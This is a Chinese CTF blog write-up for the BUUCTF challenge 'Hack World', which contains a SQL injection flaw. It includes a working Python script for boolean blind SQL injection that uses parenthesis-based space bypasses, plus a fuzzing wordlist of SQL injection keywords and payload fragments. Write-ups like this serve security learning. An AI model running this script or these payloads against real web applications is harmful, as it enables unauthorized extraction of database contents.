BUUCTF WEB [CISCN2019 華北賽區 Day2 Web1]Hack World

原創

2020-06-29 16:46

BUUCTF WEB [CISCN2019 華北賽區 Day2 Web1]Hack World

打開題目，看提示貌似是一個sql注入的題目~~
進行簡單測試，貌似不是報錯注入，直接進行盲注測試，構造一波！！
抓包構造：id=1=(1)=1與id=1=(0)=1顯示是不一樣的：

我們可以根據頁面顯示來進行注入！！fuzz一波，看看過濾了啥！

482都是被過濾了的：

ok，ascii沒有被過濾，substr也沒有！！空格被過濾可以使用()代替，，<>也沒有被過濾，=也沒有
直接寫腳本即可：

import requests
import base64
import sys
import string
import hashlib
import io
import time

sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')		#改變標準輸出的默認編碼,否則s.text不能輸出
x = string.printable
flag = ""
url = "http://56039d8e-d2a3-4fc1-8195-3e18f2c1ea8c.node3.buuoj.cn/index.php"
payload={
	"id" : ""
}
for i in range(0,60):
	for j in x:
		payload["id"] = "1=(ascii(substr((select(flag)from(flag)),%s,1))=%s)=1"%(str(i),ord(j))
		s = requests.post(url,data=payload)
		#print(s.text)
		if "Hello" in s.text:
			flag += j
			print(flag)
			break
			
print(flag)

得到flag:

sql字典，自己搞的，漏了什麼可以自己加：

select
from
ascii
substr
table
column
by
schema
where
extractvalue
exp
if
/
(
)
%
!
@
#
$
^
&
*
-
_
+
=
'
"
~
`
\
|
,
.
||
&&
order
updatexml
limit
And
Or
%23
 
<
>
regex
group_concat
table_name
table_schema
column_name
database
imformation
union select
ascii(substr())
(select(group_concat(table_name))
from(information_schema.tables)where(table_schema=database())
(ascii(substr((select(group_concat(flaaag))from(flag)),%s,1))=%s)
where(table_schema=database())

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

相關文章

BUUCTF WEB [RoarCTF 2019]Easy Calc

BUUCTF WEB [RoarCTF 2019]Easy Calc 打開網頁是一個計算的！！隨便輸入可以計算，然後就沒啥了，右鍵源代碼：存在waf，，還有個新的頁面！進行訪問，看到源代碼： <?php error_repo

2020-06-29 16:46:09

BUUCTF WEB [強網杯 2019]高明的黑客

BUUCTF WEB [強網杯 2019]高明的黑客打開網頁，發現有提示~~源碼可下下載源碼，發現3002個文件，查看一下，發現有不少的shell？？？不過都是不能用的，其實這道題目就是讓我們找到能用的shell，考察

2020-06-29 16:46:09

BUUCTF WEB（2020-2月刷題~）

BUUCTF WEB（2020-2月刷題~）開學遙遙無期，不知道該幹些什麼，上一個月完全沒有碰過題目也是時候做一做題目了，不然真的玩了一個寒假，，，，，，畢竟知識點也是需要鞏固的，，，，總是覺得自己還是太菜，，也不知道該怎麼

2020-06-29 16:46:05

BJDCTF 2nd WEB

BJDCTF 2nd WEB emmm，比賽做了幾道題，賽後官方給了wp，把沒做出來的復現一下，，，， [BJDCTF 2nd]fake google 一個SSTI，發現是jinja2的，直接用payload打就行： {% for

2020-06-29 16:46:05

XCTF WEB upload(RCTF-2015)

XCTF WEB upload(RCTF-2015) 兩百多天未解決的問題了，，，，打開題目，發現需要登錄註冊，，註冊登陸之後需要我們進行文件上傳：估摸着登錄頁面與註冊頁面沒有漏洞，，，，，畢竟題目提示就是讓我們上傳，，上

2020-06-29 16:46:09

i春秋試驗場 CTF奪旗賽（第三季）RE 整型數列

i春秋試驗場 CTF奪旗賽（第三季）RE 整型數列 emmmm，這次比賽比較簡單，沒啥好說的，，，關鍵記錄一下這個逆向題目，，，，， ida直接打開進行靜態分析：看英語好像是說可以自動跑出來，需要一些時間，，，，直接上ka

2020-06-29 16:46:09

I-SOON CTF

I-SOON CTF 各種CTF遍地開花，，，，雖然一天滿課，但是做題還是要做的！！！只能做這麼幾道了，，菜~ MISC - 吹着貝斯掃二維碼下載文件發現一堆文件，發現都是jpg文件，而且每個文件後都有個序號，進行修正：進行

2020-06-29 16:46:09

i春秋試驗場 CTF答題奪旗賽（第四季）

i春秋試驗場 CTF答題奪旗賽（第四季） web nani 進入查看源碼可以看見：添加參數file，提示一個user.php，發現存在文件包含，直接進行文件讀取，得到user.php的源碼： <?php class conve

2020-06-29 16:46:09

ciscn_2019_s_1

思路通過off by null寫key值然後unlink寫bss段再次double free寫free_hook即可拿到shell exp: from pwn import * #p=process('./ciscn_s_1')

2020-06-30 21:46:59

CTF題記——再戰GK、BUU

前言沒事做一些雜項和密碼學的題，記下沒見過的，總結思路。擴大腦洞。本文目錄前言Crypto🍖[GKCTF2020]漢字的祕密[MRCTF2020]古典密碼知多少[MRCTF2020]keyboard[WUSTCTF2020]佛

2020-06-29 07:37:14

suctf2018_heap

suctf2018_heap 這道題會一次性申請2個相同大小的chunk做的時候有點邏輯混亂深深的懷疑本來是ubuntu16的環境… 思路 : off by one打成堆重疊寫到指針段寫atoi爲system拿shell exp:

2020-06-28 23:41:06

others_easyheap

思路堆溢出構造堆塊重疊打free_hook爲system exp: from pwn import * #p=process('./easyheap') elf=ELF('./easyheap') libc=elf.libc p

2020-06-28 23:41:05

BUUCTF zctf_2016_note3

一道典型的unlink題目整形溢出因爲i是無符號長整型如果輸入-1就會變得巨大實現堆溢出這裏應該可以用unlink泄露libc基址然後用fastbin attack打malloc_hook但是這裏有多次寫入的edit功能就很好做了

2020-06-28 23:41:05

BUUCTF ciscn_2019_ne_5

這道題是一道典型的ROP一開始沒找到參數~~ 直接溢出emem exp(其實我寫的很麻煩了很簡單的) #!/usr/bin/python2 from pwn import * local=1 if local==1: p=pro

2020-06-28 23:41:05

noxctf2018_grocery_list&&actf_2019_message

noxctf2018_grocery_list 先是觀察函數發現有一個可以泄露棧地址然後通過tcache attack打到棧上泄露libcbase然後再次寫入free_hook拿到shell exp: #!/usr/bin/pyt

2020-06-28 23:41:05

24小時熱門文章

DAPPER 事務 TRANSACTION

最新文章

最新評論文章